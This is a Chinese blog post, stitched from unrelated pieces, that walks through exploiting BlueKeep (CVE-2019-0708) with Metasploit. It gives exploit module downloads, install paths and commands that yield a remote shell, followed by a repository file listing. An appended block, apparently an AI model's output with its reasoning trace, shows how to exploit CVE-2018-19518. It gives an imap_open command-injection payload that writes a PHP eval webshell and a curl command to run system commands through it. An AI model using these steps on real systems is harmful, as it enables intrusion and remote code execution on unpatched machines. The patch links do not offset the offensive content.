windows_cve_2019_0708 exp复现

本文详细介绍如何在Kali Linux环境下使用Metasploit框架利用CVE-2019-0708(蓝屏死机)漏洞。通过下载并安装特定的Exploit模块,可以对未打补丁的Windows系统进行远程攻击。文章还提供了受影响的操作系统版本及修复方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境

kali 192.168.1.10
安装msf cve_2019_0708 exp,下载地址
链接:https://pan.baidu.com/s/1_A8AtsEalYt6q85cd5cdRw 密码:7zk6

下载exp,添加到kali自带到msf中,msf首先要升级到v5以上
升级命令 apt install metasploit-framework
网盘中共4个文件,分别放入msf目录中,msf目录根据自己安装到目录来,kali自带默认安装地址为/usr/share

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/r
dp/rdp_scanner.rb  

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/r
dp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_cve.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_
bluekeep_rce.rb

msfconsole --> reload_all

win7 192.168.1.13 被攻击机,开启远程桌面,关闭防火墙

利用

msf5 > search 0708
msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 > set rhosts 192.168.1.11

因为win7用的是virtualbox,在target时要根据自己的虚拟环境进行选择
在这里插入图片描述

msf5 > set target 2
msf5 > run
shell
python 获取远程cmd

影响范围

Windows 7
Windows 2003
Windows Server 2008 R2
Windows Server 2008
Windows XP

修复方法

Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

以及为已不受微软更新支持的系统(Windows Server 2003和Windows XP)提供的安全更新,下载地址:

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

参考链接:https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83

CVE-2019-0708 POC,检测工具 C:. │ cve_2019_0708.rb │ Dockerfile │ LICENSE │ list.txt │ README.md │ screenshot.png │ 使用说明.txt │ ├─docker │ entrypoint.sh │ setup.sh │ └─rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773 │ .cvsignore │ asn.c │ bitmap.c │ bootstrap │ cache.c │ channels.c │ cliprdr.c │ config.guess │ config.sub │ configure.ac │ constants.h │ COPYING │ cssp.c │ ctrl.c │ disk.c │ disk.h │ ewmhints.c │ genauthors │ indent-all.sh │ install-sh │ iso.c │ licence.c │ lspci.c │ Makefile.in │ mcs.c │ mppc.c │ mst120.c │ orders.c │ orders.h │ parallel.c │ parse.h │ printer.c │ printercache.c │ proto.h │ proto.head │ proto.tail │ pstcache.c │ rdesktop │ rdesktop.c │ rdesktop.h │ rdesktop.spec │ rdp.c │ rdp5.c │ rdpdr.c │ rdpsnd.c │ rdpsnd.h │ rdpsnd_alsa.c │ rdpsnd_dsp.c │ rdpsnd_dsp.h │ rdpsnd_libao.c │ rdpsnd_oss.c │ rdpsnd_sgi.c │ rdpsnd_sun.c │ README │ scancodes.h │ scard.c │ scard.h │ seamless.c │ seamless.h │ secure.c │ serial.c │ ssl.c │ ssl.h │ tcp.c │ types.h │ utils.c │ xclip.c │ xkeymap.c │ xproto.h │ xwin.c │ ├─doc │ AUTHORS │ ChangeLog │ ctrl.txt │ HACKING │ ipv6.txt │ keymap-names.txt │ keymapping.txt │ keynums.png │ licensing.txt │ lspci-channel.txt │ makerelease.txt │ patches.txt │ rdesktop.1 │ rdpsnd-rec.txt │ rdpsnd.txt │ redirection.txt │ seamlessrdp-channel.txt │ TODO │ ├─keymaps │ ar │ common │ convert-map │ cs │ da │ de │ de-ch │ en-dv │ en-gb │ en-us │ en-us-intl │ es │ et │ fi │ fo │ fr │ fr-be │ fr-bepo │ fr-ca │ fr-ch │ he │ hr │ hu │ is │ it │ ja │ ko │ lt │ lv │ mk │ modifiers │ nl │ nl-be │ no │ pl │ pt │ pt-br │ ru │ sk │ sl │ sv │ th │ tr │ ├─tests │ brushtest.c │ brushtestMakefile │ notepadbehindwordpad.c │ ├─uiports │ makefile_nanox │ makefile_qt │ makefile_qte │ makefile_svga │ makefile_xxx │ nanoxreadme.txt │ nanoxwin.c │ qtereadme.txt │ qtewin.cpp │ qtewin.h │ qtreadme.txt │ qtwin.cpp │ qtwin.h │ readme.txt │ svgareadme.txt │ svgawin.c │ xxxwin.c │ └─vnc vnc.c vnc.h x11stubs.c x11stubs.h
<think>好的,用户想要复现CVE-2018-19518漏洞。首先我需要回忆这个漏洞的具体情况。根据引用中的信息,这个漏洞与PHP的imap扩展有关,存在远程命令执行的可能。用户提供的引用[2]提到初始界面是邮箱登录,有三个参数:邮箱、账号、密码,这可能涉及到利用IMAP协议处理时的漏洞。 首先,我需要确定漏洞的原理。CVE-2018-19518是由于PHP的imap_open函数未正确过滤传入的参数,导致攻击者可以注入恶意命令。引用[4]和[5]提到发送特定的EXP来利用,比如在邮箱地址参数中插入管道符号执行系统命令。例如,构造邮箱参数为“vulnerable -oProxyCommand=echo...”,这样imap_open在处理时会执行该命令。 接下来是复现步骤。根据引用[5],复现环境需要PHP安装了imap扩展,并且存在漏洞版本(PHP 5.x到7.x某些版本)。搭建一个简单的PHP页面,使用imap_open函数连接邮箱服务器。攻击者可以在邮箱地址处注入恶意命令,比如执行echo写入webshell到服务器,如生成e.php文件。然后通过访问该文件,使用POST参数1执行任意命令。 此外,用户可能需要搭建测试环境,比如使用Docker容器来配置PHP和imap扩展,确保环境隔离。同时,需要注意漏洞利用的具体参数构造,以及如何绕过可能的过滤措施。引用中提到的Repeater模块发送EXP,可能是指使用Burp Suite等工具拦截请求并修改参数,插入恶意代码。 最后,生成相关问题时需要考虑用户可能的后续需求,比如环境搭建的详细步骤、漏洞原理的深入解释、其他相关漏洞的关联,以及如何防御此类攻击。需要确保回答结构清晰,步骤明确,并且提醒用户合法授权的重要性,避免法律风险。</think>### CVE-2018-19518漏洞复现步骤 #### 1. 漏洞背景 CVE-2018-19518是PHP的`imap_open`函数因未正确过滤用户输入导致的远程命令执行漏洞。攻击者可通过构造恶意邮箱参数注入系统命令,实现任意代码执行[^4][^5]。 #### 2. 环境准备 - **漏洞环境**:PHP 5.x/7.x(需启用`imap`扩展),例如: ```bash docker run -d -p 80:80 --name vuln_env php:5.6-apache docker exec vuln_env apt-get update && docker exec vuln_env apt-get install -y libc-client-dev libkrb5-dev && docker exec vuln_env docker-php-ext-configure imap --with-kerberos --with-imap-ssl && docker exec vuln_env docker-php-ext-install imap ``` - **靶场代码**:创建`index.php`文件,内容如下: ```php <?php $server = $_POST['server']; $user = $_POST['user']; $pass = $_POST['pass']; $mbox = imap_open("{" . $server . "}INBOX", $user, $pass); imap_close($mbox); ?> ``` #### 3. 漏洞利用 1. **构造恶意请求**:通过`ProxyCommand`参数注入命令。例如写入Webshell: ```bash # 邮箱服务器参数注入(示例) server=localhost:143/user=test/password=test -oProxyCommand=echo '<?php eval($_POST[1]);' > /var/www/html/e.php ``` - 使用Burp Suite或Postman发送POST请求,参数中插入上述payload[^5]。 2. **验证利用结果**: - 访问`http://目标IP/e.php`,通过POST参数`1`执行命令: ```bash curl -X POST -d "1=system('id');" http://目标IP/e.php ``` - 若返回当前用户权限信息,则漏洞利用成功。 #### 4. 防御建议 - 升级PHP至安全版本(>=7.2.15或>=7.3.2)。 - 禁用`imap`扩展或过滤用户输入中的特殊字符(如`()`、反引号、`|`等)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值